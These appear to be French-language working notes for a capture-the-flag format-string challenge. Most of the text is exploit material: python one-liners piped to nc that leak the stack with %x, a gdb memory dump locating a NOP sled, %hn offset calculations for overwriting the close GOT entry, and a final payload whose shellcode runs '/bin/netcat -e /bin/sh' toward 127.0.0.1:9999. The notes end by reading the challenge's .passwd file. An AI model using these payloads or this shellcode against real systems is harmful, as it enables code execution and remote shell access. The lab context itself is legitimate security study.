python -c 'print "AAAA%x%x%x%x%x%"' | nc localhost 56032
AAAA0010741414141%
 5eme octet


 python -c 'print "AAAA%x%x%x%x%n"' | nc localhost 56032
—> on veut écrire sur le 5eme octet

python -c 'print "\x41\x41\x41\x41" + "\x90"*34 + "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f" + "%5$x"' | nc localhost 56334

set follow-fork-mode child
r

x/50 $esp

0xbffff3d0:	0xbffff7ec	0x00000400	0xbffff3ec	0x00000000
0xbffff3e0:	0x00000000	0x00000010	0x00000008	0xbffff3d2
0xbffff3f0:	0xbffff3d0	0x90909090	0x90909090	0x90909090
0xbffff400:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff410:	0x316a9090	0x8980cd58	0x6ac189c3	0x80cd5846
0xbffff420:	0x6850c031	0x34252f2f	0x32373039	0x24352564
0xbffff430:	0x31256e68	0x33313333	0x24362564	0x000a6e68
0xbffff440:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff450:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff460:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff470:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff480:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff490:	0x00000000	0x00000000

—> adresse shellcode 0xbffff410



0x804a048 <close@got.plt>
—> adresse ou on veut rediriger notre shellcode : 0x804a048

—> on veut écrire adresse des nops a l'adresse de la sauvegarde eip
0x0804a048 : XX XX XX XX
Nos 4 octets XX à remplacer ont chacun pour adresse (de gauche à droite) : 0804a04b, 0804a04a, 0804a049, 0804a048.
Nous devrons donc faire pointer : - le premier %hn sur l'adresse 0804a048 afin d'y écrire le nombre f410 (62480 base 10) ce qui nous donnera XX XX f4 00 - le deuxième %hn sur l'adresse 0804a04a afin d'y écrire le nombre bfff (49151 base 10) ce qui nous donnera bf ff f4 10


nbr de nops = 30
shell code = 111
+8
--> 153

49151 - 153 = 48998
62480 - 48998 - 153 = 13329

f400 62480 13313
bfff 49151 48998


python -c 'print "\x4a\xa0\x04\x08" +"\x48\xa0\x04\x08" +  "\x90"*34 + "\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x30\x30\x30\x2e\x30\x30\x30\x2e\x30\x30\x31\x23\x39\x39\x39\x39\x23" + "%48998d" + "%5$hn" + "%13329d" + "%6$hn"' | nc localhost 56032

cd challenge/app-systeme/ch32 && cat .passwd
